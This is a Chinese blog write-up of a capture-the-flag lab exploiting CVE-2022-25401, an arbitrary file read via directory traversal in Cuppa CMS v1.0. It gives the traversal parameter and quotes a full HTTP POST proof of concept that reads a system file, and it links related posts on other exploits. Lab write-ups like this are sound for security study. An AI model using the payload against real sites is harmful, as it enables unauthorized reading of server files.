春秋云境CVE-2022-25401

最新推荐文章于 2024-07-17 20:44:53 发布
最新推荐文章于 2024-07-17 20:44:53 发布
阅读量283 收藏 5
点赞数 8
分类专栏: 春秋云境 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64432806/article/details/136920613
版权

简介

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞

吐槽

这关挺抽象的,靶场提供的路径是错误的,让我们无法访问到,实际靶场的路径是/templates/default/html/windows/right.php

正文

首先来到靶场,就看到一个登录界面,这是要我来一个弱口令登录吗?然后直接开始弱口令,结果跑完了发现我的弱口令进不去。

直接访问

然后我就尝访问/templates/default/html/windows/right.php地址,发现我能直接访问到,但是访问到的界面是一个空白界面。f12发现有源码,那么就访问的没问题了。但是这什么提示也没有,我也读取不了其他文件呀。于是我就去网上查看了一下这个漏洞的poc发现这里控制的参数是url且为PSOT传参。

直接传参

那么话不多说直接上参数:?url=../../../../../../../../../../flag

这里提示一下,我们不要担心../打的太多,没关系的,这是目录穿越,我们访问上一层目录大于它的目录结构,一样是访问到根目录,没有区别,所以为了防止我们访问的时候没有访问到根目录,所以我们会习惯性的多打几个../访问后还是空白界面,别急我们直接查看源码,发现flag就在源码里面。

参考资料

这是gethub上的poc:

POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: xxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini

我们可以很明显的看到这里是用url参数来进行的目录穿越,所以我想了一下,直接只用url参数呢,没想到真的可以。就省去其他参数的必要了

是花花呢
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境CVE-2022-25401(任意文件读取漏洞)
m0_65712192的博客
04-22 1809
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞
春秋云境(2)
qq_75120258的博客
05-23 685
Pluck-CMS-Pluck-4.7.16 后台RCE打开环境源码里发现了login.php弱口令登录admin/admin之后进入这个界面在language settings里更改一下语言在options里choose theme,然后install theme(安装主题)找到上传cms主题的界面我们去GITHUB里下载一个主题。
春秋云镜 CVE-2022-25401
qq_22002773的博客
07-03 111
春秋云镜 CVE-2022-25401
春秋云境CVE-2022-25401
一只爱吃橙子的羊
12-01 930
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞
云镜CVE-2022-25401复现
m0_46684679的博客
02-09 658
Cuppa CMS v1.0 任意文件读取漏洞
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
[春秋云镜]CVE-2020-26048
niubi707的博客
12-08 1021
CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。
春秋云境CVE-2022-25488靶场WP和CVE-2022-25401靶场WP
果粒程
11-30 985
春秋云境CVE-2022-25488靶场WP和CVE-2022-25401靶场WP
春秋CVE-2022-25401 Cuppa CMS v1.0 任意文件读
xxx177的博客
11-14 1593
春秋CVE-2022-25401 Cuppa CMS v1.0 任意文件读
网络渗透测试安全攻防-Cuppa CMS 文件包含漏洞
网络安全领域优质创作者
11-05 1788
目录扫描,拿到登陆地址 http://10.11.1.116/db/phpliteadmin.php admin phpliteadmin1.9.3PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit CuppaCMS文件包含漏洞 http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../.....
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 777
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 441
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 556
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
防洪墙的安全内容检测+http请求头
最新发布
代码其实很简单
07-17 611
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值